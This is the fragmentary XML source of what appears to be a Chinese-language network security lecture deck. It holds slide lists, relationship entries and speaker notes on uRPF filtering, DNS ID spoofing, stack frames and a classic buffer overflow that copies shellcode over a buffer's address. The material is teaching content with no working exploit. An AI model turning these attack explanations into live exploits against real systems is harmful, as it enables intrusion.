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707" r:id="rId5"/>
    <p:sldId id="708" r:id="rId6"/>
    <p:sldId id="709" r:id="rId7"/>
    <p:sldId id="728" r:id="rId8"/>
    <p:sldId id="712" r:id="rId9"/>
    <p:sldId id="713" r:id="rId10"/>
    <p:sldId id="714" r:id="rId11"/>
    <p:sldId id="715" r:id="rId12"/>
    <p:sldId id="716" r:id="rId13"/>
    <p:sldId id="717" r:id="rId14"/>
    <p:sldId id="718" r:id="rId15"/>
    <p:sldId id="719" r:id="rId16"/>
    <p:sldId id="720" r:id="rId17"/>
    <p:sldId id="721" r:id="rId18"/>
    <p:sldId id="722" r:id="rId19"/>
    <p:sldId id="723" r:id="rId20"/>
    <p:sldId id="724" r:id="rId21"/>
    <p:sldId id="725" r:id="rId22"/>
    <p:sldId id="726" r:id="rId23"/>
    <p:sldId id="732" r:id="rId24"/>
    <p:sldId id="729" r:id="rId25"/>
    <p:sldId id="731" r:id="rId26"/>
    <p:sldId id="730" r:id="rId27"/>
    <p:sldId id="733" r:id="rId28"/>
    <p:sldId id="727" r:id="rId29"/>
    <p:sldId id="700" r:id="rId30"/>
    <p:sldId id="555" r:id="rId31"/>
    <p:sldId id="696" r:id="rId32"/>
    <p:sldId id="697" r:id="rId33"/>
    <p:sldId id="698" r:id="rId34"/>
    <p:sldId id="699" r:id="rId35"/>
    <p:sldId id="260" r:id="rId36"/>
    <p:sldId id="347" r:id="rId37"/>
    <p:sldId id="560" r:id="rId38"/>
    <p:sldId id="261" r:id="rId39"/>
    <p:sldId id="557" r:id="rId40"/>
    <p:sldId id="558" r:id="rId41"/>
    <p:sldId id="561" r:id="rId42"/>
    <p:sldId id="705" r:id="rId43"/>
    <p:sldId id="567" r:id="rId44"/>
    <p:sldId id="565" r:id="rId45"/>
    <p:sldId id="569" r:id="rId46"/>
    <p:sldId id="570" r:id="rId47"/>
    <p:sldId id="571" r:id="rId48"/>
    <p:sldId id="573" r:id="rId49"/>
    <p:sldId id="382" r:id="rId50"/>
    <p:sldId id="701" r:id="rId51"/>
    <p:sldId id="576" r:id="rId52"/>
    <p:sldId id="577" r:id="rId53"/>
    <p:sldId id="578" r:id="rId54"/>
    <p:sldId id="579" r:id="rId55"/>
    <p:sldId id="580" r:id="rId56"/>
    <p:sldId id="581" r:id="rId57"/>
    <p:sldId id="582" r:id="rId58"/>
    <p:sldId id="583" r:id="rId59"/>
    <p:sldId id="584" r:id="rId60"/>
    <p:sldId id="738" r:id="rId61"/>
    <p:sldId id="739" r:id="rId62"/>
    <p:sldId id="585" r:id="rId63"/>
    <p:sldId id="586" r:id="rId64"/>
    <p:sldId id="587" r:id="rId65"/>
    <p:sldId id="588" r:id="rId66"/>
    <p:sldId id="589" r:id="rId67"/>
    <p:sldId id="737" r:id="rId68"/>
    <p:sldId id="590" r:id="rId69"/>
    <p:sldId id="734" r:id="rId70"/>
    <p:sldId id="592" r:id="rId71"/>
    <p:sldId id="591" r:id="rId72"/>
    <p:sldId id="593" r:id="rId73"/>
    <p:sldId id="594" r:id="rId74"/>
    <p:sldId id="735" r:id="rId75"/>
    <p:sldId id="595" r:id="rId76"/>
    <p:sldId id="596" r:id="rId77"/>
    <p:sldId id="597" r:id="rId78"/>
    <p:sldId id="600" r:id="rId79"/>
    <p:sldId id="601" r:id="rId80"/>
    <p:sldId id="602" r:id="rId81"/>
    <p:sldId id="598" r:id="rId82"/>
    <p:sldId id="384" r:id="rId83"/>
    <p:sldId id="385" r:id="rId84"/>
    <p:sldId id="348" r:id="rId85"/>
    <p:sldId id="740" r:id="rId86"/>
    <p:sldId id="741" r:id="rId87"/>
    <p:sldId id="752" r:id="rId88"/>
    <p:sldId id="742" r:id="rId89"/>
    <p:sldId id="749" r:id="rId90"/>
    <p:sldId id="751" r:id="rId91"/>
    <p:sldId id="744" r:id="rId92"/>
    <p:sldId id="754" r:id="rId93"/>
    <p:sldId id="745" r:id="rId94"/>
    <p:sldId id="755" r:id="rId95"/>
    <p:sldId id="756" r:id="rId96"/>
    <p:sldId id="757" r:id="rId97"/>
    <p:sldId id="758" r:id="rId98"/>
    <p:sldId id="759" r:id="rId99"/>
    <p:sldId id="760" r:id="rId100"/>
    <p:sldId id="761" r:id="rId101"/>
    <p:sldId id="762" r:id="rId102"/>
    <p:sldId id="763" r:id="rId103"/>
    <p:sldId id="764" r:id="rId104"/>
    <p:sldId id="765" r:id="rId105"/>
    <p:sldId id="767" r:id="rId106"/>
    <p:sldId id="845" r:id="rId107"/>
    <p:sldId id="847" r:id="rId108"/>
    <p:sldId id="848" r:id="rId109"/>
    <p:sldId id="800" r:id="rId110"/>
    <p:sldId id="801" r:id="rId111"/>
    <p:sldId id="802" r:id="rId112"/>
    <p:sldId id="803" r:id="rId113"/>
    <p:sldId id="774" r:id="rId114"/>
    <p:sldId id="775" r:id="rId115"/>
    <p:sldId id="777" r:id="rId116"/>
    <p:sldId id="804" r:id="rId117"/>
    <p:sldId id="778" r:id="rId118"/>
    <p:sldId id="779" r:id="rId119"/>
    <p:sldId id="780" r:id="rId120"/>
    <p:sldId id="785" r:id="rId121"/>
    <p:sldId id="784" r:id="rId122"/>
    <p:sldId id="786" r:id="rId123"/>
    <p:sldId id="787" r:id="rId124"/>
    <p:sldId id="788" r:id="rId125"/>
    <p:sldId id="789" r:id="rId126"/>
    <p:sldId id="790" r:id="rId127"/>
    <p:sldId id="791" r:id="rId128"/>
    <p:sldId id="793" r:id="rId129"/>
    <p:sldId id="792" r:id="rId130"/>
    <p:sldId id="794" r:id="rId131"/>
    <p:sldId id="796" r:id="rId132"/>
    <p:sldId id="797" r:id="rId133"/>
    <p:sldId id="798" r:id="rId134"/>
    <p:sldId id="805" r:id="rId135"/>
    <p:sldId id="806" r:id="rId136"/>
    <p:sldId id="807" r:id="rId137"/>
    <p:sldId id="808" r:id="rId138"/>
    <p:sldId id="809" r:id="rId139"/>
    <p:sldId id="810" r:id="rId140"/>
    <p:sldId id="811" r:id="rId141"/>
    <p:sldId id="812" r:id="rId142"/>
    <p:sldId id="813" r:id="rId143"/>
    <p:sldId id="814" r:id="rId144"/>
    <p:sldId id="817" r:id="rId145"/>
    <p:sldId id="818" r:id="rId146"/>
    <p:sldId id="819" r:id="rId147"/>
    <p:sldId id="849" r:id="rId148"/>
    <p:sldId id="850" r:id="rId149"/>
    <p:sldId id="821" r:id="rId150"/>
    <p:sldId id="822" r:id="rId151"/>
    <p:sldId id="823" r:id="rId152"/>
    <p:sldId id="824" r:id="rId153"/>
    <p:sldId id="825" r:id="rId154"/>
    <p:sldId id="851" r:id="rId155"/>
    <p:sldId id="826" r:id="rId156"/>
    <p:sldId id="827" r:id="rId157"/>
    <p:sldId id="873" r:id="rId158"/>
    <p:sldId id="874" r:id="rId159"/>
    <p:sldId id="828" r:id="rId160"/>
    <p:sldId id="829" r:id="rId161"/>
    <p:sldId id="830" r:id="rId162"/>
    <p:sldId id="831" r:id="rId163"/>
    <p:sldId id="832" r:id="rId164"/>
    <p:sldId id="833" r:id="rId165"/>
    <p:sldId id="834" r:id="rId166"/>
    <p:sldId id="835" r:id="rId167"/>
    <p:sldId id="836" r:id="rId168"/>
    <p:sldId id="837" r:id="rId169"/>
    <p:sldId id="838" r:id="rId170"/>
    <p:sldId id="839" r:id="rId171"/>
    <p:sldId id="840" r:id="rId172"/>
    <p:sldId id="841" r:id="rId173"/>
    <p:sldId id="842" r:id="rId174"/>
    <p:sldId id="843" r:id="rId175"/>
    <p:sldId id="844" r:id="rId176"/>
    <p:sldId id="852" r:id="rId177"/>
    <p:sldId id="853" r:id="rId178"/>
    <p:sldId id="854" r:id="rId179"/>
    <p:sldId id="855" r:id="rId180"/>
    <p:sldId id="856" r:id="rId181"/>
    <p:sldId id="872" r:id="rId182"/>
    <p:sldId id="857" r:id="rId183"/>
    <p:sldId id="858" r:id="rId184"/>
    <p:sldId id="859" r:id="rId185"/>
    <p:sldId id="871" r:id="rId186"/>
    <p:sldId id="860" r:id="rId187"/>
    <p:sldId id="861" r:id="rId188"/>
    <p:sldId id="862" r:id="rId189"/>
    <p:sldId id="863" r:id="rId190"/>
    <p:sldId id="864" r:id="rId191"/>
    <p:sldId id="865" r:id="rId192"/>
    <p:sldId id="866" r:id="rId193"/>
    <p:sldId id="867" r:id="rId194"/>
    <p:sldId id="868" r:id="rId195"/>
    <p:sldId id="869" r:id="rId196"/>
    <p:sldId id="870" r:id="rId197"/>
    <p:sldId id="502" r:id="rId198"/>
    <p:sldId id="603" r:id="rId199"/>
    <p:sldId id="608" r:id="rId200"/>
    <p:sldId id="604" r:id="rId201"/>
    <p:sldId id="506" r:id="rId202"/>
    <p:sldId id="515" r:id="rId203"/>
    <p:sldId id="521" r:id="rId204"/>
    <p:sldId id="526" r:id="rId205"/>
    <p:sldId id="876" r:id="rId206"/>
    <p:sldId id="875" r:id="rId207"/>
    <p:sldId id="607" r:id="rId208"/>
    <p:sldId id="605" r:id="rId209"/>
    <p:sldId id="606" r:id="rId210"/>
    <p:sldId id="542" r:id="rId211"/>
    <p:sldId id="543" r:id="rId212"/>
    <p:sldId id="544" r:id="rId213"/>
    <p:sldId id="545" r:id="rId214"/>
    <p:sldId id="546" r:id="rId215"/>
    <p:sldId id="877" r:id="rId216"/>
    <p:sldId id="878" r:id="rId217"/>
    <p:sldId id="879" r:id="rId218"/>
    <p:sldId id="880" r:id="rId219"/>
    <p:sldId id="881" r:id="rId220"/>
    <p:sldId id="882" r:id="rId221"/>
    <p:sldId id="883" r:id="rId222"/>
    <p:sldId id="884" r:id="rId223"/>
    <p:sldId id="630" r:id="rId224"/>
    <p:sldId id="631" r:id="rId225"/>
    <p:sldId id="632" r:id="rId226"/>
    <p:sldId id="633" r:id="rId227"/>
    <p:sldId id="547" r:id="rId228"/>
    <p:sldId id="460" r:id="rId229"/>
    <p:sldId id="461" r:id="rId230"/>
    <p:sldId id="463" r:id="rId231"/>
    <p:sldId id="464" r:id="rId232"/>
    <p:sldId id="462" r:id="rId233"/>
    <p:sldId id="706" r:id="rId234"/>
    <p:sldId id="611" r:id="rId235"/>
    <p:sldId id="610" r:id="rId236"/>
    <p:sldId id="614" r:id="rId237"/>
    <p:sldId id="466" r:id="rId238"/>
    <p:sldId id="616" r:id="rId239"/>
    <p:sldId id="617" r:id="rId240"/>
    <p:sldId id="618" r:id="rId241"/>
    <p:sldId id="619" r:id="rId242"/>
    <p:sldId id="468" r:id="rId243"/>
    <p:sldId id="620" r:id="rId244"/>
    <p:sldId id="622" r:id="rId245"/>
    <p:sldId id="624" r:id="rId246"/>
    <p:sldId id="625" r:id="rId247"/>
    <p:sldId id="626" r:id="rId248"/>
    <p:sldId id="627" r:id="rId249"/>
    <p:sldId id="628" r:id="rId250"/>
    <p:sldId id="629" r:id="rId251"/>
    <p:sldId id="470" r:id="rId252"/>
    <p:sldId id="612" r:id="rId253"/>
    <p:sldId id="469" r:id="rId254"/>
    <p:sldId id="487" r:id="rId255"/>
    <p:sldId id="488" r:id="rId256"/>
    <p:sldId id="495" r:id="rId257"/>
    <p:sldId id="647" r:id="rId258"/>
    <p:sldId id="648" r:id="rId259"/>
    <p:sldId id="649" r:id="rId260"/>
    <p:sldId id="650" r:id="rId261"/>
    <p:sldId id="651" r:id="rId262"/>
    <p:sldId id="652" r:id="rId263"/>
    <p:sldId id="653" r:id="rId264"/>
    <p:sldId id="654" r:id="rId265"/>
    <p:sldId id="655" r:id="rId266"/>
    <p:sldId id="656" r:id="rId267"/>
    <p:sldId id="658" r:id="rId268"/>
    <p:sldId id="659" r:id="rId269"/>
    <p:sldId id="660" r:id="rId270"/>
    <p:sldId id="673" r:id="rId271"/>
    <p:sldId id="674" r:id="rId272"/>
    <p:sldId id="661" r:id="rId273"/>
    <p:sldId id="662" r:id="rId274"/>
    <p:sldId id="663" r:id="rId275"/>
    <p:sldId id="664" r:id="rId276"/>
    <p:sldId id="665" r:id="rId277"/>
    <p:sldId id="666" r:id="rId278"/>
    <p:sldId id="667" r:id="rId279"/>
    <p:sldId id="668" r:id="rId280"/>
    <p:sldId id="669" r:id="rId281"/>
    <p:sldId id="670" r:id="rId282"/>
    <p:sldId id="671" r:id="rId283"/>
    <p:sldId id="672" r:id="rId284"/>
    <p:sldId id="490" r:id="rId285"/>
    <p:sldId id="498" r:id="rId286"/>
    <p:sldId id="499" r:id="rId287"/>
    <p:sldId id="500" r:id="rId288"/>
    <p:sldId id="501" r:id="rId289"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>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ä¸­åº¦æ ·å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586" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="2010" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="36" y="4197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66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="84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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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102.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide101.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide100.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide99.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide98.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide97.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide96.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide50.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide263.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide255.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide254.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide252.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide183.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide181.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide148.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide132.xml"/><Relationship Id="rId1"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68.w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71.e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70.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.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74.e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77.e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77.e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79.emf"/><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78.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.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image" Target="../media/image22.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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image" Target="../media/image30.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.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en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239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1239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1239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239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1239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DAA3022-0CAB-4EC6-99D2-5818CE3AB5CA}"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0661761-AE77-440E-B231-E11A97596515}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1792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823E8EF-5D7E-483C-81F9-3DA4AF30E4D7}"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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199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1D83F9E1-2C90-4C41-854A-A1FDE1E9C22F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3788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mtClean="0"/>
              <a:t>ip verify unicast reverse-path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>命令用于丢弃掉不对称路由的包；不对称路由的包就是包的出口和入口不同；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>该命令用于丢弃非法源地址的包，例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</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599314C-4AEE-40DE-ACFD-99373003F87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8482" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="166465250"/>
            <a:ext cx="0" cy="2147011200"/>
          </a:xfr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8483"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如果攻击者不能够窃听受害者的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查询请求包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗攻击同样也是可以实施的</a:t>
            </a:r>
            <a:endParaRPr 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1554" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="166465250"/>
            <a:ext cx="0" cy="2147011200"/>
          </a:xfr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51555"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如果攻击者不能够窃听受害者的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查询请求包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗攻击同样也是可以实施的</a:t>
            </a:r>
            <a:endParaRPr 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A5ED8B6-8197-4BC9-BF3E-508A41D62D93}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体"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DEDEE5-2910-4A32-95A8-2E91F5EE0957}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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栈帧也叫过程活动记录，是编译器用来实现过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数调用的一种数据结构。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从逻辑上讲，栈帧就是一个函数执行的环境：函数参数、函数的局部变量、函数执行完后返回到哪里等等。</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DEDEE5-2910-4A32-95A8-2E91F5EE0957}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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2879933-A891-4C8B-A25D-8AA5FA0A23ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>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D44B118-10DA-49F9-A580-4FB07D582CA2}"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201731" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201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1C07CB6-1C42-4064-B242-CECCC0EFED09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300034" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300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656CE2-C8AF-4132-A2AC-A1F8B7623C57}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302082" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3020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375134F-7FB0-40B8-B98C-67D113B2EDDA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="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ea typeface="宋体"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A1C2E52-5A11-463E-A3BA-63DEDBD7075F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的首地址，并且将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的首地址都放到里面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的内容到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，覆盖前面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>首地址，这样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>前面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中内容，后面是</a:t>
            </a:r>
            <a:r>
